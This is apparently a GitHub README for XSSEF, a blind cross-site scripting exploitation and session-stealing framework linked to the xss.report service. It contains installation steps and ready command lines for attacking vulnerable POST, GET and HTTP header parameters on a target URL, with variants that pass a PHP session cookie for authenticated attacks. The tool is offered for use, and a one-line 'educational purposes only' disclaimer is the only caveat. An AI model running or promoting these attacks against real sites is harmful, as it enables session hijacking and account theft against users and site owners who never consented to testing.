https://xss.report Blind Cross Site Scripting Vulnerability Exploitation Framework

Sakintiklama/XSSEF

XSSEF

Blind Cross Site Scripting Vulnerability Exploitation Framework. An authenticated and unauthenticated POST, GET and HTTP header XSS exploitation and session-stealing framework. To use it, you must be registered with the framework system (xss.report).

It is for educational purposes only. In case of abuse, the user is responsible.

1)- USAGE BOOK

2)- REQUIREMENTS

3)- DOWNLOAD AND INSTALLATION

4)- PARAMETERS AND WORKS

DOWNLOAD & INSTALLATION

$ git clone https://github.com/ringzerofy/XSSEF.git
$ cd XSSEF
$ chmod u+x xssef.py   # Linux only; not required when launching with "python xssef.py"
$ python xssef.py --help

PARAMETERS & WORKS

--user [-u] -> Framework username
--target [-t] -> (VULNERABLE) TARGET URL

--post [-p] -> VULNERABLE POST PARAMETER
--get [-g] -> VULNERABLE GET PARAMETER
--cookie [-c] -> COOKIE FOR AUTHENTICATION (FOR AUTHENTICATED VULNERABILITIES)

REQUIREMENTS

Python Version >= 3.0

$ pip install requests
$ pip install argparse   # part of the standard library since Python 3.2

XSSEF Framework Account

USAGE BOOK

[POST] PARAMETER EXPLOITATION

Unauthenticated POST Value Exploitation :

$ python xssef.py -t [TARGET URL] -u [FRAMEWORK USERNAME] -p [VULNERABLE POST PARAMETER]

Authenticated POST Value Exploitation :

$ python xssef.py -t [TARGET URL] -u [FRAMEWORK USERNAME] -p [VULNERABLE POST PARAMETER] -c [PHPSESSION ID FOR AUTHENTICATION]

[GET] PARAMETER EXPLOITATION

Unauthenticated GET Value Exploitation :

$ python xssef.py -t [TARGET URL] -u [FRAMEWORK USERNAME] -g [VULNERABLE GET PARAMETER]

Authenticated GET Value Exploitation :

$ python xssef.py -t [TARGET URL] -u [FRAMEWORK USERNAME] -g [VULNERABLE GET PARAMETER] -c [PHPSESSION ID FOR AUTHENTICATION]

[HTTP HEADER] PARAMETER EXPLOITATION

Unauthenticated HTTP HEADER Value Exploitation :

$ python xssef.py -t [TARGET URL] -u [FRAMEWORK USERNAME]

Authenticated HTTP HEADER Value Exploitation :

$ python xssef.py -t [TARGET URL] -u [FRAMEWORK USERNAME] -c [PHPSESSION ID FOR AUTHENTICATION]
